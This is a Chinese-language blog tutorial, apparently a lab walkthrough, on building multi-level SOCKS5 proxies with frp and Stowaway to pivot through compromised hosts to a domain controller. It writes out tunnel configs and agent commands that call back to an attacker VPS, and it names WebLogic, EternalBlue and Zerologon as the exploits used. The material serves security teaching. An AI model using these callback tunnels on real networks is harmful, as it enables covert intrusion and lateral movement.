内网渗透--轻松玩转多级代理

admin
admin
admin
138674
文章
114
评论
2024年2月12日23:41:19评论111 views字数 2315阅读7分43秒阅读模式

前言:

本文利用靶场来简单介绍一下如何利用frp,stowaway搭建多级代理。搭建多级代理有助于我们在实战中去发现更多的资产以及有价值的机器,也是内网渗透中必会的技巧。

内网渗透--轻松玩转多级代理

 01 
利用frp搭建多级代理

第一层代理:

vps启动服务端:
./frps -p 9999
内网渗透--轻松玩转多级代理
在入口机器作为客户端,启动frpc,frpc客户端:
[common]
server_addr = 1.1.1.1
server_port = 9999

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
配置socks5代理:
socks5:vps:7777,成功连接到第一层代理:
内网渗透--轻松玩转多级代理

第二层代理:

通过fscan扫描,获取到一台机器为双网卡,且存在weblogic漏洞:

内网渗透--轻松玩转多级代理

通过weblogic漏洞获取到主机权限,对10段进行信息收集,发现另一张双网卡机器,且存在永恒之蓝:

内网渗透--轻松玩转多级代理

接下来就是通过代理去打10.10.10.20.7这个永恒之蓝

入口机上操作:
启动frps服务端:
frps.exe --bind_addr 192.168.225.144 --bind_port 9999

内网渗透--轻松玩转多级代理

启动frpc客户端:
#frpc.ini
[common]
server_addr = 1.1.1.1
server_port = 9999

[plugin_socks]
type = tcp
local_ip = 192.168.225.144
local_port = 8888
remote_port = 7777

这里可以仔细对比一下第一层代理的配置文件,删除了plugin=socks5功能,增加了local_ip和local_port参数:

frpc.exe -c frpc.ini

内网渗透--轻松玩转多级代理

还可以不用配置文件,直接命令行启动:

frpc.exe tcp --local_ip 192.168.225.144 --local_port 8888 --server_addr 1.1.1.1:9999 --remote_port 7777

内网渗透--轻松玩转多级代理

weblogic机器上操作:
启动frpc客户端:

frpc.ini

[common]
server_addr = 192.168.225.144
server_port = 9999

[http_proxy]
type = tcp
remote_port = 8888
plugin = socks5

运行:

frpc.exe -c frpc.ini
配置socks5代理:

socks5:vps:7777,成功连接到第二层代理

成功访问到10.10.20.7机器:

内网渗透--轻松玩转多级代理

通过msf成功获取到该权限,且该机器存在于域环境中:域控地址为10.10.10.8,当前代理不可达。

内网渗透--轻松玩转多级代理

第三层代理拿下域控:

weblogic机器上操作:
启动frps服务端:
frps.exe --bind_addr 10.10.20.12 --bind_port 9999

内网渗透--轻松玩转多级代理

启动frp客户端:

配置frpc客户端:

[common]
server_addr = 192.168.225.144
server_port = 9999

[http_proxy]
type = tcp
local_ip = 10.10.20.12
local_port = 6666
remote_port = 8888

内网渗透--轻松玩转多级代理

或者直接命令启动:

frpc.exe tcp --local_ip 10.10.20.12 --local_port 6666 --server_addr 192.168.225.144:9999 --remote_port 8888
ms17010机器上操作:
配置frpc客户端:
[common]
server_addr = 10.10.20.12
server_port = 9999

[http_proxy]
type = tcp
remote_port = 6666
plugin = socks5

内网渗透--轻松玩转多级代理

配置socks5代理:

socks5:vps:7777,成功连接到第三层代理

cve-2020-1472拿下域控:

内网渗透--轻松玩转多级代理


 02 

利用Stowaway搭建多级代理

Stowaway个人认为是一款很不错的代理工具,实战中也是用的比较多,利用Stowaway可以快速简单的搭建代理以及多级代理
项目地址:https://github.com/ph4ntonn/Stowaway
工具分为admin端和agent端,与服务端客户端类似

第一层代理:

vps启动admin端:

-s是设置加密通道

/linux_x64_admin -l 9999 -s qqq123

内网渗透--轻松玩转多级代理

入口机上启动agent端:

agent.exe -c 39.101.140.47:9999 -s qqq123 --reconnect 10

--reconnect是设置重连间隔,当断开时会尝试10s连一次

内网渗透--轻松玩转多级代理

可以看到有一个节点成功加入:

use 该节点,可进入管理界面:

use 0

内网渗透--轻松玩转多级代理

socks 8888  #开启socks5代理,端口为8888

内网渗透--轻松玩转多级代理

连接socks5://vps:8888即可

第二层代理:

先在上面节点上开启一个监听:

listen

设置好要监听的地址和端口

内网渗透--轻松玩转多级代理

上传agent到weblogic主机:

agent.exe -c 192.168.225.144:9999 -s qqq123 --reconnect 10

可以看到node1节点加入:

内网渗透--轻松玩转多级代理

use 1
socks 7777

内网渗透--轻松玩转多级代理

代理成功,设置:

socks5://1.1.1.1:7777

成功访问到第二层代理:

内网渗透--轻松玩转多级代理

第三层代理:

重复上面步骤,继续在node1上进行监听:

内网渗透--轻松玩转多级代理

上传agent到ms17010主机:

agent.exe -c 10.10.20.12:9999 -s qqq123 --reconnect 10

内网渗透--轻松玩转多级代理

可以看到node2加入成功:

use 2
socks 6666

内网渗透--轻松玩转多级代理

代理成功,设置socks5://1.1.1.1:6666

成功访问到域控:

内网渗透--轻松玩转多级代理

原文始发于微信公众号(Rock sec):内网渗透--轻松玩转多级代理

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月12日23:41:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透--轻松玩转多级代理https://cn-sec.com/archives/2489676.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息